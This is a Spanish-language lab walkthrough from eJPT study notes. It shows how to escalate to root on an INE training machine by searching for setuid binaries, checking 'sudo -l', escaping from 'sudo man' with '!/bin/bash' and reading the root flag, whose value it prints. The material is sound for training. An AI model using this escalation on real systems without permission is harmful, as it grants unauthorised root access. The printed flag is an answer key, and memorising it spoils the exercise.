> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-notes/pruebas-de-penetracion-de-host-y-red/post-explotacion/escalada/escalada-de-privilegios-en-linux/escalada-de-privilegios-linux-permisos-sudo.md).

# Escalada de privilegios Linux: permisos Sudo

## 🧪 Laboratorio Práctico

**Paso 1:** Abra el enlace del laboratorio para acceder a la máquina Kali.

<figure><img src="/files/kjVtwpCx6nDTDUQKZjh8" alt=""><figcaption></figcaption></figure>

**Paso 2:** Verifique si la máquina de destino es accesible:

**Dominio:**

```
ping -c 4 target.ine.local
```

<figure><img src="/files/29gvnMeL7qPRk059vdIj" alt=""><figcaption></figcaption></figure>

El objetivo es alcanzable.

**Paso 3:** Abra Firefox y acceda a la terminal de la máquina de destino en **<http://target.ine.local:8000>** .

<figure><img src="/files/Sbh6vDufbDtd2q9C1U4A" alt=""><figcaption></figcaption></figure>

**Paso 4:** No se da ninguna pista específica en este desafío, así que comience por encontrar el enfoque del programa setuid.

**Dominio:**

```
find / -user root -perm -4000 -exec ls -ldb {} \;
```

<figure><img src="/files/chnUv1tIxwfkOp6IfB9b" alt=""><figcaption></figcaption></figure>

**Paso 5:** No hay ninguna anomalía. Continúe buscando el sudo mal configurado. Verifique las capacidades actuales de sudo.

**Dominio:**

```
sudo -l
```

<figure><img src="/files/m4d8NdlipKivNBQxmdxz" alt=""><figcaption></figcaption></figure>

**Paso 6:** La entrada "man" indica que el comando "man" puede ejecutarse usando sudo sin necesidad de proporcionar contraseña. Ejecútelo y ejecute /bin/bash desde allí.

**Dominio:**

```
sudo man ls
```

<figure><img src="/files/3IV3bC53no2Ht8cI8nKJ" alt=""><figcaption></figcaption></figure>

**Dominio:**

```
!/bin/bash
```

<figure><img src="/files/pQmXT5EbgnK6NBvDn7GQ" alt=""><figcaption></figcaption></figure>

**Paso 7:** Verifique que la escalada al usuario root se haya realizado correctamente. Vaya al directorio /root y recupere la marca.

**Comandos:**

```
cd /root
ls -l
cat flag
```

<figure><img src="/files/HUGxoqfNSRAGFQVgQtBZ" alt=""><figcaption></figcaption></figure>

**Bandera:** 74f5cc752947ec8a522f9c49453b8e9a

#### Conclusión

En este laboratorio, buscamos una forma posible de aumentar los privilegios en un sistema comprometido.
